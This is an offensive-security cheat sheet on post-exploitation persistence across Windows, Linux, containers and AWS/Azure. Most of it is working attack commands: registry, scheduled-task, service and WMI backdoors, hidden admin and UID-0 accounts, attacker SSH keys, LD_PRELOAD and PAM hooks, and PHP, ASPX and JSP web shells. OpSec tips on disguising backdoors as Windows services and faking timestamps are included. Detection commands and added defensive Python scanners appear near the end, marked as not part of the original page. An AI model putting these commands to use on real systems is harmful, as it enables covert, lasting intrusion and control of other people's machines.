Establishing Persistence
When to Use
- Maintaining access to compromised systems
- Post-exploitation techniques
- Red team operations
- Persistence testing
- Backdoor creation
Windows Persistence
Registry Run Keys
# HKCU Run (current user)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# HKLM Run (all users - requires admin)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# RunOnce (runs once then deletes)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
# Policies Run
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"
PowerShell Registry:
# HKCU Run
New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Backdoor" -Value "C:\Windows\Temp\backdoor.exe" -PropertyType String
# Verify
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Scheduled Tasks
# Create task to run at logon
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\backdoor.exe" /sc onlogon /ru System
# Run every hour
schtasks /create /tn "SystemCheck" /tr "C:\Windows\Temp\backdoor.exe" /sc hourly /ru System
# Run daily at specific time
schtasks /create /tn "Maintenance" /tr "C:\Windows\Temp\backdoor.exe" /sc daily /st 09:00 /ru System
# Run on system startup
schtasks /create /tn "StartupTask" /tr "C:\Windows\Temp\backdoor.exe" /sc onstart /ru System
# List tasks
schtasks /query /fo LIST /v
PowerShell Scheduled Task:
$action = New-ScheduledTaskAction -Execute "C:\Windows\Temp\backdoor.exe"
$trigger = New-ScheduledTaskTrigger -AtLogon
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "WindowsUpdate" -Description "System Maintenance"
Windows Services
# Create new service
sc create "WindowsUpdate" binPath= "C:\Windows\Temp\backdoor.exe" start= auto
sc description "WindowsUpdate" "Keeps your Windows system updated"
# Start service
sc start "WindowsUpdate"
# Modify existing service
sc config "ServiceName" binPath= "C:\Windows\Temp\backdoor.exe"
# Service with SYSTEM privileges
sc create "SecurityUpdate" binPath= "C:\Windows\Temp\backdoor.exe" start= auto obj= LocalSystem
PowerShell Service:
New-Service -Name "WindowsDefender" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -DisplayName "Windows Defender Update" -StartupType Automatic
Start-Service "WindowsDefender"
WMI Event Subscription
# Create WMI event to run payload on logon
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
Name = "UserLogon";
EventNamespace = "root\cimv2";
QueryLanguage = "WQL";
Query = "SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession'";
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{
Name = "RunBackdoor";
CommandLineTemplate = "C:\Windows\Temp\backdoor.exe";
}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
Filter = $Filter;
Consumer = $Consumer;
}
Startup Folder
# Current user startup
copy backdoor.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe"
# All users startup (requires admin)
copy backdoor.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe"
DLL Hijacking
# Place malicious DLL in application directory
# Common DLL hijacking candidates:
# - version.dll
# - wlbsctrl.dll
# - oci.dll
copy evil.dll "C:\Program Files\Application\version.dll"
Image File Execution Options
# Hijack executable launch
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe"
# Now pressing Shift 5 times at login opens cmd.exe
AppInit_DLLs
# Load DLL into every process (requires admin)
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t REG_SZ /d "C:\Windows\Temp\evil.dll"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 1
Backdoor Accounts
# Create hidden admin account
net user backdoor P@ssw0rd /add
net localgroup Administrators backdoor /add
# Hide account (ends with $)
net user backdoor$ P@ssw0rd /add
net localgroup Administrators backdoor$ /add
# Hide account from the logon screen (0 = do not list in SpecialAccounts\UserList)
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v backdoor /t REG_DWORD /d 0
Linux Persistence
Cron Jobs
# User crontab (no sudo needed)
crontab -e
# Add:
@reboot /tmp/.backdoor
# Every hour (cron does not allow trailing comments on a command line)
0 * * * * /tmp/.backdoor
# System-wide cron (requires root)
echo "@reboot root /tmp/.backdoor" >> /etc/crontab
# Cron.d directory
echo "* * * * * root /tmp/.backdoor" > /etc/cron.d/backdoor
# Daily/hourly cron scripts
cp backdoor.sh /etc/cron.daily/update
chmod +x /etc/cron.daily/update
Systemd Services
# Create service file
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/tmp/.backdoor
Restart=always
[Install]
WantedBy=multi-user.target
EOF
# Enable and start
systemctl daemon-reload
systemctl enable backdoor.service
systemctl start backdoor.service
# Verify
systemctl status backdoor.service
RC Scripts (Init.d)
# Create init script
cat > /etc/init.d/backdoor << EOF
#!/bin/bash
### BEGIN INIT INFO
# Provides: backdoor
# Required-Start: \$network
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
### END INIT INFO
/tmp/.backdoor &
EOF
chmod +x /etc/init.d/backdoor
update-rc.d backdoor defaults
SSH Keys
# Add attacker's public key
mkdir -p /root/.ssh
echo "ssh-rsa AAAA...attacker_key" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# For specific user
echo "ssh-rsa AAAA...attacker_key" >> /home/user/.ssh/authorized_keys
.bashrc / .bash_profile
# Add to user's .bashrc
echo "/tmp/.backdoor &" >> ~/.bashrc
echo "/tmp/.backdoor &" >> ~/.bash_profile
# Root .bashrc
echo "/tmp/.backdoor &" >> /root/.bashrc
LD_PRELOAD
# Hijack library loading
echo "/tmp/evil.so" > /etc/ld.so.preload
# Will load evil.so into every process
MOTD Backdoor
# Add to message of the day scripts (runs on SSH login)
echo "/tmp/.backdoor &" >> /etc/update-motd.d/00-header
chmod +x /etc/update-motd.d/00-header
APT/Package Manager
# APT hook (Debian/Ubuntu)
cat > /etc/apt/apt.conf.d/99backdoor << EOF
APT::Update::Pre-Invoke {"/tmp/.backdoor &";};
EOF
# Runs before apt update
Git Hooks
# If git repositories exist
echo "/tmp/.backdoor &" > /path/to/repo/.git/hooks/post-checkout
chmod +x /path/to/repo/.git/hooks/post-checkout
# Triggers on git checkout
Backdoor Accounts
# Create backdoor user with root UID
useradd -u 0 -o -g 0 -M -d /root -s /bin/bash backdoor
echo "backdoor:P@ssw0rd" | chpasswd
# Or add to /etc/passwd directly
echo "backdoor:x:0:0::/root:/bin/bash" >> /etc/passwd
echo "backdoor:$(openssl passwd -6 P@ssw0rd):::::::" >> /etc/shadow
PAM Backdoor
# Add to /etc/pam.d/sshd or /etc/pam.d/common-auth
# Use custom PAM module that accepts magic password
auth sufficient pam_unix.so try_first_pass
auth sufficient /lib/security/pam_backdoor.so
Web Shells
PHP Web Shell
<?php
// simple.php
system($_GET['cmd']);
?>
Advanced:
<?php
if($_GET['key'] == 'secret') {
eval($_POST['cmd']);
}
?>
Upload Locations:
# Web roots
/var/www/html/
/var/www/
/usr/share/nginx/html/
C:\inetpub\wwwroot\
# Hidden names
.htaccess.php
favicon.ico.php
robots.txt.php
ASP/ASPX Web Shell
<%@ Page Language="C#" %>
<%
Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c " + Request["cmd"]).StandardOutput.ReadToEnd());
%>
JSP Web Shell
<%
Runtime.getRuntime().exec(request.getParameter("cmd"));
%>
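A defender-side check for the shells and hidden file names listed above, added here as an example that is not part of the original page: it writes a constructed web root to a temporary directory and flags files by double extension (favicon.ico.php, .htaccess.php) and by command execution driven from request input. The pattern list and extension sets are assumptions chosen for this example.

```python
import os
import re
import tempfile

# Content patterns derived from the PHP/ASPX/JSP shells shown on this page.
SHELL_PATTERNS = [
    re.compile(r"\b(system|passthru|shell_exec|exec)\s*\(\s*\$_(GET|POST|REQUEST)"),
    re.compile(r"\beval\s*\(\s*\$_(GET|POST|REQUEST)"),
    re.compile(r"Process\.Start\s*\("),
    re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\("),
]
EXEC_EXT = {".php", ".phtml", ".asp", ".aspx", ".jsp"}
STATIC_EXT = {".ico", ".txt", ".jpg", ".png", ".gif", ".css", ".js"}

def suspicious_name(filename):
    """Flag favicon.ico.php / .htaccess.php: a static-looking name carrying a server-side extension."""
    base, ext = os.path.splitext(filename)
    return ext.lower() in EXEC_EXT and (base == ".htaccess" or os.path.splitext(base)[1].lower() in STATIC_EXT)

def scan_web_root(root):
    """Return (relative path, reasons) for every file that trips a name or content check."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if suspicious_name(name):
                reasons.append("double extension")
            if os.path.splitext(name)[1].lower() in EXEC_EXT:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                if any(p.search(text) for p in SHELL_PATTERNS):
                    reasons.append("command execution from request input")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

def demo():
    """Write a constructed web root (invented files, not from a real host) and scan it."""
    samples = {
        "index.php": "<?php echo 'hello'; ?>",
        "simple.php": "<?php system($_GET['cmd']); ?>",
        "favicon.ico.php": "<?php if($_GET['key'] == 'secret') { eval($_POST['cmd']); } ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, content in samples.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_web_root(root)
```

Run it against a real document root by calling scan_web_root("/var/www/html"); every hit still needs manual review, since legitimate code can match the content patterns.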
Container Persistence
Docker:
# Modify container to restart always
docker update --restart=always container_name
# Add to docker-compose.yml
restart: always
# Create new container with backdoor
docker run -d --restart=always --name backdoor evil_image
Kubernetes:
# DaemonSet (runs on all nodes)
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: backdoor
spec:
  selector:
    matchLabels:
      name: backdoor
  template:
    metadata:
      labels:
        name: backdoor
    spec:
      containers:
      - name: backdoor
        image: attacker/backdoor:latest
Cloud Persistence
AWS
# Create IAM user
aws iam create-user --user-name backdoor
# Attach admin policy
aws iam attach-user-policy --user-name backdoor --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# Create access key
aws iam create-access-key --user-name backdoor
# Lambda function persistence
# Create Lambda that executes periodically via CloudWatch Events
Azure
# Create service principal
az ad sp create-for-rbac --name "backdoor" --role Contributor
# Create managed identity
az identity create --name backdoor --resource-group RG
# Function App persistence
# Deploy Azure Function that runs on schedule
Rootkits
User-mode Rootkit:
- Hook library functions
- Process hiding
- File hiding
- Network hiding
Kernel-mode Rootkit:
- Loadable kernel module (LKM)
- Hooks system calls
- Harder to detect
- Requires root
# Example LKM (requires kernel headers)
# Compile and load malicious kernel module
insmod backdoor.ko
Persistence Detection
Windows:
# Check Run keys
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
# Check scheduled tasks
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft*"}
# Check services
Get-Service | Where-Object {$_.StartType -eq "Automatic"}
# Check WMI subscriptions
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
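The Windows checks above list autostart entries but leave the triage to the reader. As an added example that is not part of the original page, this Python triages constructed excerpts of `schtasks /query /fo CSV /v` and `reg query` output and flags tasks and Run values whose executable lives in a user-writable directory such as C:\Windows\Temp. The column names are real; the rows, the value names and the writable-directory pattern are assumptions for this example.

```python
import csv
import io
import re

# Constructed excerpt of `schtasks /query /fo CSV /v` output, reduced to three of its real
# column names; the rows are invented for this example.
SAMPLE_SCHTASKS = '''"TaskName","Task To Run","Run As User"
"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c -h -o -$","SYSTEM"
"\\WindowsUpdate","C:\\Windows\\Temp\\backdoor.exe","SYSTEM"
"\\Maintenance","C:\\Program Files\\Vendor\\tool.exe","alice"
'''
# Constructed excerpt of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.
SAMPLE_RUN_KEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Backdoor    REG_SZ    C:\Windows\Temp\backdoor.exe
"""

# Directories any local user can write to; a SYSTEM-level autostart pointing here is a red flag.
WRITABLE_DIR = re.compile(r"\\(Temp|Users\\Public)\\", re.IGNORECASE)

def suspicious_tasks(csv_text):
    """Tasks outside the \\Microsoft\\ tree whose action executes from a writable directory."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["TaskName"].startswith("\\Microsoft\\"):
            continue  # same filter as the Get-ScheduledTask check above
        if WRITABLE_DIR.search(row["Task To Run"]):
            hits.append((row["TaskName"], row["Run As User"]))
    return hits

def suspicious_run_values(reg_text):
    """Run-key value names whose command line points into a writable directory."""
    hits = []
    for line in reg_text.splitlines():
        m = re.match(r"\s+(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.+)$", line)
        if m and WRITABLE_DIR.search(m.group(2)):
            hits.append(m.group(1))
    return hits

def triage():
    return {"tasks": suspicious_tasks(SAMPLE_SCHTASKS), "run_keys": suspicious_run_values(SAMPLE_RUN_KEY)}

if __name__ == "__main__":
    print(triage())
```

On a live host, feed the functions the saved output of the two commands named in the comments; extend WRITABLE_DIR with any directories your own users can write to.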
Linux:
# Check cron jobs
crontab -l
ls -la /etc/cron.*
cat /etc/crontab
# Check systemd services
systemctl list-unit-files --type=service --state=enabled
# Check init scripts
ls -la /etc/init.d/
# Check SSH authorized_keys
cat ~/.ssh/authorized_keys
cat /root/.ssh/authorized_keys
# Check LD_PRELOAD
cat /etc/ld.so.preload
# Check for hidden files
find / -name ".*"
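The Linux checks above dump the relevant files but do not say what to look for in them. As an added example that is not part of the original page, this Python audits constructed copies of /etc/passwd, /etc/crontab and /etc/ld.so.preload for the specific artifacts this page creates: a second UID-0 account, a cron entry running a hidden binary from /tmp, and a populated preload file. The sample contents and the world-writable directory list are assumptions for this example.

```python
import re

# Constructed samples (not from a real host): a second UID-0 user as created by `useradd -o -u 0`
# above, a cron entry launching a hidden binary from /tmp, and a populated /etc/ld.so.preload.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
backdoor:x:0:0::/root:/bin/bash
"""
SAMPLE_CRONTAB = """# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
@reboot root /tmp/.backdoor
0 2 * * * root /usr/local/bin/backup.sh
"""
SAMPLE_PRELOAD = "/tmp/evil.so\n"

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")  # a path component starting with '.'

def extra_root_accounts(passwd_text):
    """Names other than root whose UID is 0 (the useradd -o / append-to-passwd trick)."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names

def suspicious_cron_entries(crontab_text, system_wide=True):
    """Commands that run a hidden file or anything from a world-writable directory."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        n_sched = 1 if parts[0].startswith("@") else 5   # @reboot vs. five time fields
        cmd = " ".join(parts[n_sched + (1 if system_wide else 0):])  # /etc/crontab has a user column
        if any(d in cmd for d in WORLD_WRITABLE) or HIDDEN_PATH.search(cmd):
            hits.append(cmd)
    return hits

def preload_entries(preload_text):
    """/etc/ld.so.preload is normally absent or empty; every listed path needs an owner."""
    return [p.strip() for p in preload_text.splitlines() if p.strip()]

def audit(passwd=SAMPLE_PASSWD, crontab=SAMPLE_CRONTAB, preload=SAMPLE_PRELOAD):
    return {"extra_uid0": extra_root_accounts(passwd), "cron": suspicious_cron_entries(crontab),
            "preload": preload_entries(preload)}
```

Pass system_wide=False when checking the output of crontab -l, whose lines have no user column.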
OpSec Tips
- Blend in - Use system-like names (WindowsUpdate, SystemCheck)
- Redundancy - Establish multiple persistence methods
- Stealth - Avoid noisy methods that generate logs
- Cleanup - Remove persistence when engagement ends
- Timestamps - Match file timestamps to system files
Tools
- PowerSploit - PowerShell post-exploitation
- Empire - Post-exploitation framework
- Metasploit - Persistence modules
- SILENTTRINITY - Modern C2 framework
- Covenant - .NET C2 framework